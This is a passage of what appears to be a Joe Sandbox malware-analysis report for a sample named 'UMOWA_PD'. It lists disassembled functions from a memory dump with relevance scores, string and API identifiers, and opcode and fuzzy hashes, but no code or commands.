                                                                                    • Instruction Fuzzy Hash: 983124756087419FD301CF68D894B1ABBE4EF85B18F090969FC94CBB90EB31DA05CB52
                                                                                    Function 33CC33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 33D0289F
                                                                                    • RtlpInitializeAssemblyStorageMap, xrefs: 33D0289A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                    • API String ID: 0-2653619699
                                                                                    • Opcode ID: 23bf74f5edf28717006335a05f6c15a00b33ee5e5230f72ae539da693ae2e3f5
                                                                                    • Instruction ID: 5a4856943468268cb02ce1adc41b1ae49336e468f7f10f741370480143e096b8
                                                                                    • Opcode Fuzzy Hash: 23bf74f5edf28717006335a05f6c15a00b33ee5e5230f72ae539da693ae2e3f5
                                                                                    • Instruction Fuzzy Hash: EF1129B6F01305BFF715CA49DD80F9B7AA8DF84B50F188069B904DB244DA78CD0187A0
                                                                                    Function 33C9C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MUI
                                                                                    • API String ID: 0-1339004836
                                                                                    • Opcode ID: 60af57674cb60365eaa2058fb0b74718dca174433cd92e93a8404adac0b1a3c0
                                                                                    • Instruction ID: e0fa4413ec410160c172898f58fbdcbfad7160087d222e6e58b5648f5d594919
                                                                                    • Opcode Fuzzy Hash: 60af57674cb60365eaa2058fb0b74718dca174433cd92e93a8404adac0b1a3c0
                                                                                    • Instruction Fuzzy Hash: 168248B9E003188BFB14CFA9C894BDDB7B5BF49750F168169E859EB290DB309D81CB50
                                                                                    Function 33C964F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ca53e09e6c382bfeadb022d36820d3d802566074b8ce0cbca76f01cc2381afb
                                                                                    • Instruction ID: 2ab862659fe240202f5742c781f42c7f733d1affd13f4140f3d458f6b972b82b
                                                                                    • Opcode Fuzzy Hash: 5ca53e09e6c382bfeadb022d36820d3d802566074b8ce0cbca76f01cc2381afb
                                                                                    • Instruction Fuzzy Hash: 64E19E75608341CFE304CF28C490A9ABBE4FF89364F06896DE595CB391DB31E916CB92
                                                                                    Function 33CBE507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 496e34009b89fda0d847ed39ca714a9961ad677729f780c4bae5b72650d4eddb
                                                                                    • Instruction ID: 6d015ef348646402c37d5ec1e885c71a25137e51765c9f6fc76513f635546d85
                                                                                    • Opcode Fuzzy Hash: 496e34009b89fda0d847ed39ca714a9961ad677729f780c4bae5b72650d4eddb
                                                                                    • Instruction Fuzzy Hash: 28A1FD72E00718AFEB159BA4D844B9EBBB8EF04B54F090221E950EF6A0DB749D44CB91
                                                                                    Function 33C91051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 9bcee79cb596add683c1ea8d5b9da764d8229a850819536bdb34ddd193e8aa05
                                                                                    • Instruction ID: a2c8263a0e18d459f93aa3172e9cfafd8427ea8684e3f70dd41e7f7a6d290add
                                                                                    • Opcode Fuzzy Hash: 9bcee79cb596add683c1ea8d5b9da764d8229a850819536bdb34ddd193e8aa05
                                                                                    • Instruction Fuzzy Hash: A2B101B59093809FE354CF28C480A5AFBF1BF88344F594A6EE899CB352D731E845CB42
                                                                                    Function 33C9254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: e05e4fdf75e088050fb3e7438f1386ceb99ef5dfccc3f896d6fdfd7aa927b517
                                                                                    • Instruction ID: 0044b406f9df8b755f9e298737aed2de0e3ac1b220715009d5f376a5e738caf9
                                                                                    • Opcode Fuzzy Hash: e05e4fdf75e088050fb3e7438f1386ceb99ef5dfccc3f896d6fdfd7aa927b517
                                                                                    • Instruction Fuzzy Hash: 1E41CF75901B08CFE760DF25C950B89B7F5FF44364F26869AC19ADFAA0DB30AA41CB41
                                                                                    Function 33C94779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: ce053c39ac53c9b2bcbd388693cf53559582378bd0bfc485242829f8cd2ece84
                                                                                    • Instruction ID: ef2b03ebba8570b3869b990efc8d9999684c812e55bdca6a9d16f0f0744b4a21
                                                                                    • Opcode Fuzzy Hash: ce053c39ac53c9b2bcbd388693cf53559582378bd0bfc485242829f8cd2ece84
                                                                                    • Instruction Fuzzy Hash: 7F41E8766003818FE710CF28D894BAAB7EAFF81750F1644ADE941CF6A1DB30D895CB95
                                                                                    Function 33C956E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 65b312adc3f963689d78edc1c22b51d672497752591c88f001d584eaeee38623
                                                                                    • Instruction ID: 8e71ac3f95cd2011b9ae36fbbbb7ffed79b0544502c0e1ccdf688ab40b8a24aa
                                                                                    • Opcode Fuzzy Hash: 65b312adc3f963689d78edc1c22b51d672497752591c88f001d584eaeee38623
                                                                                    • Instruction Fuzzy Hash: 13319839A21A06FFE7459B24CE90A89BBA6FF88654F455055EC40CBE51DB35E930CB80
                                                                                    Function 33D3E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: fda4f434f74c3a056f286d04307381d79e88a514fd87af303979ea6546eee4b3
                                                                                    • Instruction ID: b2aa00a210def9196d65616b56a5a161811d07ccb08cca28d6494730e4d65632
                                                                                    • Opcode Fuzzy Hash: fda4f434f74c3a056f286d04307381d79e88a514fd87af303979ea6546eee4b3
                                                                                    • Instruction Fuzzy Hash: 51314FB6906301DFC700DF19C44095ABBE5FF8A764F4986ADE488AB651D730ED05CF92
                                                                                    Function 33C93536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 146197d96288f12900b6995e7a54213426ca27f4277235aa0bc195636936a23f
                                                                                    • Instruction ID: a1cb4b2190aa4d60e94e7a1893430b24940732a73a47199d53fd42c1ff6f6d97
                                                                                    • Opcode Fuzzy Hash: 146197d96288f12900b6995e7a54213426ca27f4277235aa0bc195636936a23f
                                                                                    • Instruction Fuzzy Hash: B2210435502744AFE722AF19C944B9ABBA5FF84B20F460059E841CFA41CB70EC48CBD1
                                                                                    Function 33C892AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 75ec5fe6118e28cb1c583a9929e4962007e9d60df68367c2c5939a0c8eace5ef
                                                                                    • Instruction ID: c3c69ddf858eeb517abddb2843a627d70c8d94f845a140d126c65aa1e1cb9e58
                                                                                    • Opcode Fuzzy Hash: 75ec5fe6118e28cb1c583a9929e4962007e9d60df68367c2c5939a0c8eace5ef
                                                                                    • Instruction Fuzzy Hash: D3F0F032100B046BD3319B09CC04F8ABBEDEF84B04F080118A542D7490C6A0FA09C650
                                                                                    Function 33CA02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #%u
                                                                                    • API String ID: 0-232158463
                                                                                    • Opcode ID: 42654e0433106173cd788771e85e4484ac1769336d72b68579d7c940138fdabc
                                                                                    • Instruction ID: f940739be547b31dcdc975331462675a55a44d7188cff4dbd4963767d3d27e16
                                                                                    • Opcode Fuzzy Hash: 42654e0433106173cd788771e85e4484ac1769336d72b68579d7c940138fdabc
                                                                                    • Instruction Fuzzy Hash: 09714A71E0060A9FDB05CFA9C994BAEB7F8FF08744F154165E901EB651EB34E941CB60
                                                                                    Function 33CAE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXT-
                                                                                    • API String ID: 0-1948896318
                                                                                    • Opcode ID: 0c2513bcf6349b70a5002429570925e63661d57a0278ffac71243c58d6b82737
                                                                                    • Instruction ID: 5c07e04bb05d73ad12db7d2b73bd1e912b2073b00b1c1be37045ab057ab34e69
                                                                                    • Opcode Fuzzy Hash: 0c2513bcf6349b70a5002429570925e63661d57a0278ffac71243c58d6b82737
                                                                                    • Instruction Fuzzy Hash: 5A41AE72D183169BD710DA79D894B9FB3E8AF88704F450E2DF584EB190EB74D9048792
                                                                                    Function 33CC41BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
                                                                                    • Instruction ID: 28d9e32178ed6580f5437845199312bc9fcfea99db260a7eaa8b4da7640d4843
                                                                                    • Opcode Fuzzy Hash: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
                                                                                    • Instruction Fuzzy Hash: 8A519971501B11ABD321CF19C841A6BB7F8FF88B10F01892AFA95D76A0E774E945CB91
                                                                                    Function 33D0C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryHash
                                                                                    • API String ID: 0-2202222882
                                                                                    • Opcode ID: 3aaba816e47bce06f545486f7f4c563195b480507409446b1faa4756dbcb596e
                                                                                    • Instruction ID: 3e80485c89baf7ad346374df1c0c022a4e835e533bee3ed01568f67afd5cba82
                                                                                    • Opcode Fuzzy Hash: 3aaba816e47bce06f545486f7f4c563195b480507409446b1faa4756dbcb596e
                                                                                    • Instruction Fuzzy Hash: F64133B1D0062DABDB21DA60DC84FDEB77CEB44714F0145E5E609AB150DB709E898FA4
                                                                                    Function 33CC360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Flst
                                                                                    • API String ID: 0-2374792617
                                                                                    • Opcode ID: e3891e22da392ef4635f6a1ef4fa7dbf6c54947cf8b4bb55fec8623c10040d33
                                                                                    • Instruction ID: 98f2420283af6b5598fad52cc096d8252cffc94770915c5bc1e6febe223d55ca
                                                                                    • Opcode Fuzzy Hash: e3891e22da392ef4635f6a1ef4fa7dbf6c54947cf8b4bb55fec8623c10040d33
                                                                                    • Instruction Fuzzy Hash: 804185B1605301DFD304CF19E180A16BBE4FF89B14F59816EE499CB281DB75D886CB91
                                                                                    Function 33C896E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 3Gw3Gw
                                                                                    • API String ID: 3446177414-644730685
                                                                                    • Opcode ID: a3b526c2708458b6a48d677cc25d17070d5ac1efc87ae7d0ed4aa30bf57057de
                                                                                    • Instruction ID: 48f3d3a28263262ea778fb9f27c26934194c51b0df0474c7c54b03db1a8c2dbe
                                                                                    • Opcode Fuzzy Hash: a3b526c2708458b6a48d677cc25d17070d5ac1efc87ae7d0ed4aa30bf57057de
                                                                                    • Instruction Fuzzy Hash: 8121F576900B11AFC7218F58C440B1ABBF5EB84B68F160829A559EFB41DB30EA00CBD0
                                                                                    Function 33D0C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: BinaryName
                                                                                    • API String ID: 0-215506332
                                                                                    • Opcode ID: ac50d7600e4b626a948b9edebe269e86f7bfbd2463068f5429527565f19c924e
                                                                                    • Instruction ID: 9c8a27ed50f2251f35f248afa92b23026d8b1af1ca744df1b80c0c0b83d07c53
                                                                                    • Opcode Fuzzy Hash: ac50d7600e4b626a948b9edebe269e86f7bfbd2463068f5429527565f19c924e
                                                                                    • Instruction Fuzzy Hash: 1C31C5BAD00615BFEB15CA58C945E6FB778EFC0F20F114529E801AB650DB309E04CBD0
                                                                                    Function 33CE717A Relevance: .7, Instructions: 705COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 19592eee69b8ab7ddacd6be813ee83d1c419bef0b232ec8d08d4b5596d2af747
                                                                                    • Instruction ID: ea77797028568bcecee219ad31ef696b21b8dd42c19285821cfef76b4d6a482d
                                                                                    • Opcode Fuzzy Hash: 19592eee69b8ab7ddacd6be813ee83d1c419bef0b232ec8d08d4b5596d2af747
                                                                                    • Instruction Fuzzy Hash: 8842B175A007168FEB09CF59C8906AEB7B6FF88355B18855DE851EB740DB34EC42CBA0
                                                                                    Function 33CBB1E0 Relevance: .6, Instructions: 629COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff0a85d8bf83c0459d811f2b81fd94ece3b21203d9083ff80cc6d857499732df
                                                                                    • Instruction ID: 0aedfe86fdca5d40d50037a541f17e2611333952875db7b65df6ca509c1bbbce
                                                                                    • Opcode Fuzzy Hash: ff0a85d8bf83c0459d811f2b81fd94ece3b21203d9083ff80cc6d857499732df
                                                                                    • Instruction Fuzzy Hash: CC32A0B6E00619DBDF14DFA9C880BAEBBB1FF44754F190029E845EB390E775A901CB91
                                                                                    Function 33CA2760 Relevance: .6, Instructions: 605COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dcdf38e74b69fc60691da1e44ba684c89ed35b78bbde1dc8312eda0f94f5bc24
                                                                                    • Instruction ID: 500c233abce556be063853c70343c1dbfe5714bd8d5da321c819e490ee605062
                                                                                    • Opcode Fuzzy Hash: dcdf38e74b69fc60691da1e44ba684c89ed35b78bbde1dc8312eda0f94f5bc24
                                                                                    • Instruction Fuzzy Hash: F032FF79A007598FEB54CF6AC8507AEBBF2BF84704F24411DE485DF684DB36A862CB50
                                                                                    Function 33C88347 Relevance: .4, Instructions: 380COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78c684753d4a7725917643fb380658cbc83af9736c18c4e58975a8e197611da1
                                                                                    • Instruction ID: 970e2f276dbb93ac9f652f063d98f702a2ed7ce727c9490e854e9b63c87f2210
                                                                                    • Opcode Fuzzy Hash: 78c684753d4a7725917643fb380658cbc83af9736c18c4e58975a8e197611da1
                                                                                    • Instruction Fuzzy Hash: 85D10572A0071ADBEB04CF65C890ABE73B5BF4434AF494529F855DFA80EB34EA45C750
                                                                                    Function 33C9D700 Relevance: .3, Instructions: 342COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_33c60000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23165cab13bd0bb5346b10524295300cc3322c2180f3adb5d3fa7bfa26950d94
                                                                                    • Instruction ID: 851ffd87f5d1ec907ad3df3e0c6f519ad0b98d112c4551bead373e58e319a603
                                                                                    • Opcode Fuzzy Hash: 23165cab13bd0bb5346b10524295300cc3322c2180f3adb5d3fa7bfa26950d94
                                                                                    • Instruction Fuzzy Hash: 85C1C075E00316AFEB18CB59CC54BDEB7B5AF84314F5A82A9E855EB380D731E941CB80
                                                                                    Function 33CD1763 Relevance: .3, Instructions: 322COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, Offset: 33C60000, based on PE: true
